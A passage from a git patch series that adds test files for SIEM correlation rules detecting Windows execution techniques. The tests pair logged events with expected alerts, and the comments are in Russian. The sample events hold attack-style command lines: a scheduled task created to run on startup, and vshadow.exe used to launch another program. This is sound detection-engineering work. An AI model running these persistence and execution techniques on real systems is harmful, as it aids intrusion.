"Schtasks_Commandline|test_w10x64-130.testlab.org|synthetic:username@testlab|username|create", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "process", "object.account.domain": "testlab", "object.account.id": "synthetic:username@testlab", "object.account.name": "username", "object.account.session_id": "30183247", "object.name": "test", "object.process.cmdline": "\"C:\\WINDOWS\\system32\\schtasks.exe\" -create -tn test /sc Onstart", "object.process.cwd": "C:\\Users\\username\\Desktop\\", "object.process.fullpath": "c:\\windows\\system32\\schtasks.exe", "object.process.guid": "63310a87-6528-611a-0000-00106bb3f401", "object.process.id": "8668", "object.process.meta": "Description:Task Scheduler Configuration Tool | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "schtasks.exe", "object.process.original_name": "schtasks.exe", "object.process.parent.cmdline": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"", "object.process.parent.fullpath": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "object.process.parent.guid": "63310a87-64dd-611a-0000-0010b515f401", "object.process.parent.id": "7148", "object.process.parent.name": "powershell.exe", "object.process.parent.path": "c:\\windows\\system32\\windowspowershell\\v1.0\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.19041.906 (WinBuild.160101.0800)", "status": "success", "subject": "account", "subject.account.domain": "testlab", "subject.account.id": "synthetic:username@testlab", "subject.account.name": "username", "subject.account.privileges": "High", "subject.account.session_id": "30183247"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_execution/Schtasks_Commandline/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_execution/Schtasks_Commandline/tests/test_2.sc new file mode 100644 index 00000000..c981b269 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_execution/Schtasks_Commandline/tests/test_2.sc @@ -0,0 +1,5 @@ +{"action": "execute", "body": "{ \"Event\": { \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\", \"System\": { \"Provider\": { \"Name\": \"Microsoft-Windows-PowerShell\", \"Guid\": \"{a0c1853b-5c40-4b15-8766-3cf1c58f985a}\" }, \"EventID\": \"4104\", \"Version\": \"1\", \"Level\": \"5\", \"Task\": \"2\", \"Opcode\": \"15\", \"Keywords\": \"0x0\", \"TimeCreated\": { \"SystemTime\": \"2021-08-16T13:16:24.2372357Z\" }, \"EventRecordID\": \"661762\", \"Correlation\": { \"ActivityID\": \"{a5f1f89b-9179-0005-5b0c-f3a57991d701}\" }, \"Execution\": { \"ProcessID\": \"7148\", \"ThreadID\": \"5328\" }, \"Channel\": \"Microsoft-Windows-PowerShell/Operational\", \"Computer\": \"Test_w10x64-130.testlab.org\", \"Security\": { \"UserID\": \"S-1-5-21-1129291328-2819992169-918366777-1113\" } }, \"EventData\": { \"Data\": [ { \"text\": \"1\", \"Name\": \"MessageNumber\" }, { \"text\": \"1\", \"Name\": \"MessageTotal\" }, { \"text\": \"schtasks.exe -create -tn \\\"test\\\" /sc Onstart \", \"Name\": \"ScriptBlockText\" }, { \"text\": \"3f1bc101-7f89-45b1-b934-0843b62a022c\", \"Name\": \"ScriptBlockId\" }, { \"Name\": \"Path\" } ] }, \"RenderingInfo\": { \"Culture\": \"en-US\", \"Message\": \"Creating Scriptblock text (1 of 1):\\r\\nschtasks.exe -create -tn \\\"test\\\" /sc Onstart \\r\\n\\r\\nScriptBlock ID: 3f1bc101-7f89-45b1-b934-0843b62a022c\\r\\nPath: \", \"Level\": \"Verbose\", \"Task\": \"Execute a Remote Command\", \"Opcode\": \"On create calls\", \"Channel\": \"Microsoft-Windows-PowerShell/Operational\", \"Provider\": null, \"Keywords\": null } } }", "category.generic": "Command", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Operating system", "event_src.fqdn": "test_w10x64-130.testlab.org", "event_src.host": "test_w10x64-130.testlab.org", "event_src.hostname": "test_w10x64-130", "event_src.subsys": "Microsoft-Windows-PowerShell/Operational", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Common_PowerShell_4104_Command_executed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4104", "normalized": true, "numfield1": 1, "numfield2": 1, "object": "command", "object.account.id": "S-1-5-21-1129291328-2819992169-918366777-1113", "object.id": "3f1bc101-7f89-45b1-b934-0843b62a022c", "object.process.cmdline": "schtasks.exe -create -tn \"test\" /sc Onstart", "object.process.id": "7148", "object.value": "schtasks.exe -create -tn \"test\" /sc Onstart", "recv_ipv4": "127.0.0.1", "recv_time": "2021-08-16T16:44:55Z", "status": "success", "subject": "account", "subject.account.id": "S-1-5-21-1129291328-2819992169-918366777-1113", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2021-08-16T13:16:24.237Z", "type": "raw", "uuid": "81abeb5a-6639-49fe-b87a-58050f411983"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "create", "alert.context": "create the task: test|regex_match: schtasks.exe -create", "alert.key": "schtasks.exe -create -tn \"test\" /sc onstart", "category.generic": "Attack", "category.high": "Execution", "category.low": "Scheduled Task", "correlation_name": "Schtasks_Commandline", "correlation_type": "event", "event_src.category": "Operating system", "event_src.fqdn": "test_w10x64-130.testlab.org", "event_src.host": "test_w10x64-130.testlab.org", "event_src.hostname": "test_w10x64-130", "event_src.subsys": "Microsoft-Windows-PowerShell/Operational", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "Schtasks_Commandline|test_w10x64-130.testlab.org|S-1-5-21-1129291328-2819992169-918366777-1113||create", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "command", "object.account.id": "S-1-5-21-1129291328-2819992169-918366777-1113", "object.id": "3f1bc101-7f89-45b1-b934-0843b62a022c", "object.name": "test", "object.process.cmdline": "schtasks.exe -create -tn \"test\" /sc Onstart", "object.process.id": "7148", "object.value": "schtasks.exe -create -tn \"test\" /sc Onstart", "status": "success", "subject": "account", "subject.account.id": "S-1-5-21-1129291328-2819992169-918366777-1113"} + diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_execution/Schtasks_Commandline/tests/test_3.sc b/packages/windows_open_package/correlation_rules/mitre_attck_execution/Schtasks_Commandline/tests/test_3.sc new file mode 100644 index 00000000..b7a0c099 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_execution/Schtasks_Commandline/tests/test_3.sc @@ -0,0 +1,4 @@ +{"action": "execute", "body": "{ \"Event\": { \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\", \"System\": { \"Provider\": { \"Name\": \"Microsoft-Windows-PowerShell\", \"Guid\": \"{a0c1853b-5c40-4b15-8766-3cf1c58f985a}\" }, \"EventID\": \"4103\", \"Version\": \"1\", \"Level\": \"4\", \"Task\": \"106\", \"Opcode\": \"20\", \"Keywords\": \"0x0\", \"TimeCreated\": { \"SystemTime\": \"2021-08-16T14:30:58.9480233Z\" }, \"EventRecordID\": \"661880\", \"Correlation\": { \"ActivityID\": \"{a5f1f89b-9179-0002-50e2-f2a57991d701}\" }, \"Execution\": { \"ProcessID\": \"7148\", \"ThreadID\": \"5328\" }, \"Channel\": \"Microsoft-Windows-PowerShell/Operational\", \"Computer\": \"Test_w10x64-130.testlab.org\", \"Security\": { \"UserID\": \"S-1-5-21-1129291328-2819992169-918366777-1113\" } }, \"EventData\": { \"Data\": [ { \"text\": \" Severity = Informational\\r\\n Host Name = ConsoleHost\\r\\n Host Version = 5.1.19041.1151\\r\\n Host ID = 5e42d873-69cb-4e36-be87-477b62fbd6d7\\r\\n Host Application = C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\r\\n Engine Version = 5.1.19041.1151\\r\\n Runspace ID = 42cacf1f-2d8b-4a39-a17a-273e3f3df292\\r\\n Pipeline ID = 86\\r\\n Command Name = Invoke-Expression\\r\\n Command Type = Cmdlet\\r\\n Script Name = \\r\\n Command Path = \\r\\n Sequence Number = 180\\r\\n User = TESTLAB\\\\username\\r\\n Connected User = \\r\\n Shell ID = Microsoft.PowerShell\\r\\n\", \"Name\": \"ContextInfo\" }, { \"Name\": \"UserData\" }, { \"text\": \"CommandInvocation(Invoke-Expression): \\\"Invoke-Expression\\\"\\r\\nParameterBinding(Invoke-Expression): name=\\\"Command\\\"; value=\\\"Stop-ScheduledTask -taskname test\\\"\\r\\n\", \"Name\": \"Payload\" } ] }, \"RenderingInfo\": { \"Culture\": \"en-US\", \"Message\": \"CommandInvocation(Invoke-Expression): \\\"Invoke-Expression\\\"\\r\\nParameterBinding(Invoke-Expression): name=\\\"Command\\\"; value=\\\"Stop-ScheduledTask -taskname test\\\"\\r\\n\\r\\n\\r\\nContext:\\r\\n Severity = Informational\\r\\n Host Name = ConsoleHost\\r\\n Host Version = 5.1.19041.1151\\r\\n Host ID = 5e42d873-69cb-4e36-be87-477b62fbd6d7\\r\\n Host Application = C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\r\\n Engine Version = 5.1.19041.1151\\r\\n Runspace ID = 42cacf1f-2d8b-4a39-a17a-273e3f3df292\\r\\n Pipeline ID = 86\\r\\n Command Name = Invoke-Expression\\r\\n Command Type = Cmdlet\\r\\n Script Name = \\r\\n Command Path = \\r\\n Sequence Number = 180\\r\\n User = TESTLAB\\\\username\\r\\n Connected User = \\r\\n Shell ID = Microsoft.PowerShell\\r\\n\\r\\n\\r\\nUser Data:\\r\\n\\r\\n\", \"Level\": \"Information\", \"Task\": \"Executing Pipeline\", \"Opcode\": \"To be used when operation is just executing a method\", \"Channel\": \"Microsoft-Windows-PowerShell/Operational\", \"Provider\": null, \"Keywords\": null } } }", "category.generic": "Command", "category.high": "System Management", "category.low": "Manipulation", "chain_id": "86", "datafield8": "5.1.19041.1151", "event_src.category": "Operating system", "event_src.fqdn": "test_w10x64-130.testlab.org", "event_src.host": "test_w10x64-130.testlab.org", "event_src.hostname": "test_w10x64-130", "event_src.subsys": "Microsoft-Windows-PowerShell/Operational", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Common_PowerShell_4103_pipeline_executed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4103", "normalized": true, "object": "command", "object.account.domain": "testlab", "object.account.id": "S-1-5-21-1129291328-2819992169-918366777-1113", "object.account.name": "username", "object.process.cmdline": "\"Invoke-Expression\" -Command \"Stop-ScheduledTask -taskname test\"", "object.process.name": "Invoke-Expression", "object.process.parent.cmdline": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "object.process.parent.guid": "5e42d873-69cb-4e36-be87-477b62fbd6d7", "object.process.parent.id": "7148", "object.value": "CommandInvocation(Invoke-Expression): \"Invoke-Expression\"\r\nParameterBinding(Invoke-Expression): name=\"Command\"; value=\"Stop-ScheduledTask -taskname test\"", "recv_ipv4": "127.0.0.1", "recv_time": "2021-08-16T17:32:14Z", "status": "success", "subject": "account", "subject.account.domain": "testlab", "subject.account.id": "S-1-5-21-1129291328-2819992169-918366777-1113", "subject.account.name": "username", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2021-08-16T14:30:58.948Z", "type": "raw", "uuid": "107bcd70-6173-48a4-969b-05bce36a8384"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "stop", "alert.context": "stop the task: test|regex_match: stop-scheduledtask", "alert.key": "\"invoke-expression\" -command \"stop-scheduledtask -taskname test\"", "category.generic": "Attack", "category.high": "Execution", "category.low": "Scheduled Task", "chain_id": "86", "correlation_name": "Schtasks_Commandline", "correlation_type": "event", "datafield8": "5.1.19041.1151", "event_src.category": "Operating system", "event_src.fqdn": "test_w10x64-130.testlab.org", "event_src.host": "test_w10x64-130.testlab.org", "event_src.hostname": "test_w10x64-130", "event_src.subsys": "Microsoft-Windows-PowerShell/Operational", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Schtasks_Commandline|test_w10x64-130.testlab.org|S-1-5-21-1129291328-2819992169-918366777-1113|username|stop", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "command", "object.account.domain": "testlab", "object.account.id": "S-1-5-21-1129291328-2819992169-918366777-1113", "object.account.name": "username", "object.name": "test", "object.process.cmdline": "\"Invoke-Expression\" -Command \"Stop-ScheduledTask -taskname test\"", "object.process.name": "Invoke-Expression", "object.process.parent.cmdline": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "object.process.parent.guid": "5e42d873-69cb-4e36-be87-477b62fbd6d7", "object.process.parent.id": "7148", "object.value": "CommandInvocation(Invoke-Expression): \"Invoke-Expression\"\r\nParameterBinding(Invoke-Expression): name=\"Command\"; value=\"Stop-ScheduledTask -taskname test\"", "status": "success", "subject": "account", "subject.account.domain": "testlab", "subject.account.id": "S-1-5-21-1129291328-2819992169-918366777-1113", "subject.account.name": "username"} \ No newline at end of file From 3705a309800ee5da61eebc69e6cb4ce3d8cccca4 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Tue, 1 Aug 2023 10:32:26 +0300 Subject: [PATCH 34/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD=D1=8B?= =?UTF-8?q?=D0=B9=20=D1=82=D0=B5=D1=81=D1=82=20=D0=B4=D0=BB=D1=8F=20=D0=BF?= =?UTF-8?q?=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Start=5Fprocess=5Fas=5F?= =?UTF-8?q?vshadow=5Fchild)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../Start_process_as_vshadow_child/tests/test_1.sc | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_execution/Start_process_as_vshadow_child/tests/test_1.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_execution/Start_process_as_vshadow_child/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_execution/Start_process_as_vshadow_child/tests/test_1.sc new file mode 100644 index 00000000..10f89499 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_execution/Start_process_as_vshadow_child/tests/test_1.sc @@ -0,0 +1,4 @@ +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-05-28T02:14:50.4136318Z\"},\"EventRecordID\":\"6414\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"548\",\"ThreadID\":\"2444\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-05-28 02:14:50.390\"},{\"Name\":\"ProcessGuid\",\"text\":\"{365abb72-999a-5cec-0000-0010c3a11700}\"},{\"Name\":\"ProcessId\",\"text\":\"1516\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\notepad.exe\"},{\"Name\":\"FileVersion\",\"text\":\"6.1.7600.16385 (win7_rtm.090713-1255)\"},{\"Name\":\"Description\",\"text\":\"Notepad\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"c:\\\\windows\\\\System32\\\\notepad.exe\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"c:\\\\ProgramData\\\\\"},{\"Name\":\"User\",\"text\":\"IEWIN7\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{365abb72-82ec-5cec-0000-0020734a0100}\"},{\"Name\":\"LogonId\",\"text\":\"0x14a73\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=FC64B1EF19E7F35642B2A2EA5F5D9F4246866243,MD5=A4F6DF0E33E644E802C8798ED94D80EA,SHA256=B56AFE7165AD341A749D2D3BD925D879728A1FE4A4DF206145C1A69AA233F68B,IMPHASH=53A6715F589E88C4FD4541C81B4F57C3\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{365abb72-9998-5cec-0000-00107d501700}\"},{\"Name\":\"ParentProcessId\",\"text\":\"3092\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\ProgramData\\\\vshadow.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"vshadow.exe -nw -exec=c:\\\\windows\\\\System32\\\\notepad.exe c:\\\\\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "365abb72-82ec-5cec-0000-0020734a0100", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "iewin7", "object.account.id": "synthetic:ieuser@iewin7", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "84595", "object.process.cmdline": "\"c:\\windows\\System32\\notepad.exe\"", "object.process.cwd": "c:\\ProgramData\\", "object.process.fullpath": "c:\\windows\\system32\\notepad.exe", "object.process.guid": "365abb72-999a-5cec-0000-0010c3a11700", "object.process.hash.imphash": "53A6715F589E88C4FD4541C81B4F57C3", "object.process.hash.md5": "A4F6DF0E33E644E802C8798ED94D80EA", "object.process.hash.sha1": "FC64B1EF19E7F35642B2A2EA5F5D9F4246866243", "object.process.hash.sha256": "B56AFE7165AD341A749D2D3BD925D879728A1FE4A4DF206145C1A69AA233F68B", "object.process.id": "1516", "object.process.meta": "Description:Notepad | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "notepad.exe", "object.process.parent.cmdline": "vshadow.exe -nw -exec=c:\\windows\\System32\\notepad.exe c:\\", "object.process.parent.fullpath": "c:\\programdata\\vshadow.exe", "object.process.parent.guid": "365abb72-9998-5cec-0000-00107d501700", "object.process.parent.id": "3092", "object.process.parent.name": "vshadow.exe", "object.process.parent.path": "c:\\programdata\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "6.1.7600.16385 (win7_rtm.090713-1255)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-05T11:42:05.596Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "84595", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-05-28T02:14:50.390Z", "type": "raw", "uuid": "a5783593-a6fe-45c5-8aad-adf29c9ebb39"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "start", "category.generic": "Attack", "category.high": "Execution", "category.low": "System Services: Service Execution", "correlation_name": "Start_process_as_vshadow_child", "correlation_type": "incident", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Start_process_as_vshadow_child|iewin7|synthetic:ieuser@iewin7", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "process", "object.account.domain": "iewin7", "object.account.id": "synthetic:ieuser@iewin7", "object.account.name": "ieuser", "object.account.session_id": "84595", "object.process.cmdline": "\"c:\\windows\\System32\\notepad.exe\"", "object.process.cwd": "c:\\ProgramData\\", "object.process.fullpath": "c:\\windows\\system32\\notepad.exe", "object.process.guid": "365abb72-999a-5cec-0000-0010c3a11700", "object.process.hash.md5": "A4F6DF0E33E644E802C8798ED94D80EA", "object.process.hash.sha1": "FC64B1EF19E7F35642B2A2EA5F5D9F4246866243", "object.process.hash.sha256": "B56AFE7165AD341A749D2D3BD925D879728A1FE4A4DF206145C1A69AA233F68B", "object.process.id": "1516", "object.process.meta": "Description:Notepad | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "notepad.exe", "object.process.parent.cmdline": "vshadow.exe -nw -exec=c:\\windows\\System32\\notepad.exe c:\\", "object.process.parent.fullpath": "c:\\programdata\\vshadow.exe", "object.process.parent.guid": "365abb72-9998-5cec-0000-00107d501700", "object.process.parent.id": "3092", "object.process.parent.name": "vshadow.exe", "object.process.parent.path": "c:\\programdata\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "6.1.7600.16385 (win7_rtm.090713-1255)", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "84595"} From 1c6a5e79bbdb297f92c76015f4d6d81ef3ee1f75 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Tue, 1 Aug 2023 10:50:12 +0300 Subject: [PATCH 35/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(VSSVC=5F?= =?UTF-8?q?service=5Fstate=5Fchanged)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 3-4 интеграционный тест не могут нормализовать данные. --- .../VSSVC_service_state_changed/tests/test_1.sc | 4 ++++ .../VSSVC_service_state_changed/tests/test_2.sc | 4 ++++ 2 files changed, 8 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_execution/VSSVC_service_state_changed/tests/test_1.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_execution/VSSVC_service_state_changed/tests/test_2.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_execution/VSSVC_service_state_changed/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_execution/VSSVC_service_state_changed/tests/test_1.sc new file mode 100644 index 00000000..a925c843 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_execution/VSSVC_service_state_changed/tests/test_1.sc @@ -0,0 +1,4 @@ +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4688\",\"Version\":\"2\",\"Level\":\"0\",\"Task\":\"13312\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-05T08:46:55.3231989Z\"},\"EventRecordID\":\"26381023\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"10216\"},\"Channel\":\"Security\",\"Computer\":\"win10-work.stand2008.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-18\"},{\"Name\":\"SubjectUserName\",\"text\":\"WIN10-WORK$\"},{\"Name\":\"SubjectDomainName\",\"text\":\"STAND2008\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x3e7\"},{\"Name\":\"NewProcessId\",\"text\":\"0xa08\"},{\"Name\":\"NewProcessName\",\"text\":\"C:\\\\Windows\\\\System32\\\\VSSVC.exe\"},{\"Name\":\"TokenElevationType\",\"text\":\"%%1936\"},{\"Name\":\"ProcessId\",\"text\":\"0x344\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\vssvc.exe\"},{\"Name\":\"TargetUserSid\",\"text\":\"S-1-0-0\"},{\"Name\":\"TargetUserName\",\"text\":\"-\"},{\"Name\":\"TargetDomainName\",\"text\":\"-\"},{\"Name\":\"TargetLogonId\",\"text\":\"0x0\"},{\"Name\":\"ParentProcessName\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"MandatoryLabel\",\"text\":\"S-1-16-16384\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "event_src.category": "Operating system", "event_src.fqdn": "win10-work.stand2008.local", "event_src.host": "win10-work.stand2008.local", "event_src.hostname": "win10-work", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4688_A_new_process_has_been_created", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4688", "normalized": true, "object": "process", "object.account.domain": "stand2008", "object.account.id": "S-1-5-18", "object.account.name": "win10-work$", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\vssvc.exe", "object.process.fullpath": "c:\\windows\\system32\\vssvc.exe", "object.process.id": "2568", "object.process.name": "vssvc.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.id": "836", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-05T09:03:36.660Z", "status": "success", "subject": "account", "subject.account.domain": "stand2008", "subject.account.id": "S-1-5-18", "subject.account.name": "win10-work$", "subject.account.privileges": "TokenElevationTypeDefault", "subject.account.session_id": "999", "subject.state": "on behalf of oneself", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-06-05T08:46:55.323Z", "type": "raw", "uuid": "6606c632-5844-40bf-96ca-f5749582324b"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "start", "category.generic": "Attack", "category.high": "Execution", "category.low": "System Services: Service Execution", "correlation_name": "VSSVC_service_state_changed", "correlation_type": "event", "event_src.fqdn": "win10-work.stand2008.local", "event_src.host": "win10-work.stand2008.local", "event_src.hostname": "win10-work", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "VSSVC_service_state_changed|win10-work.stand2008.local", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "service", "object.account.domain": "stand2008", "object.account.id": "S-1-5-18", "object.account.name": "win10-work$", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\vssvc.exe", "object.process.fullpath": "c:\\windows\\system32\\vssvc.exe", "object.process.id": "2568", "object.process.name": "vssvc.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.id": "836", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "reason": "|Service execution", "status": "success", "subject": "account", "subject.account.domain": "stand2008", "subject.account.id": "S-1-5-18", "subject.account.name": "win10-work$", "subject.account.privileges": "TokenElevationTypeDefault", "subject.account.session_id": "999"} \ No newline at end of file diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_execution/VSSVC_service_state_changed/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_execution/VSSVC_service_state_changed/tests/test_2.sc new file mode 100644 index 00000000..2109aef9 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_execution/VSSVC_service_state_changed/tests/test_2.sc @@ -0,0 +1,4 @@ +{"action": "start", "body": 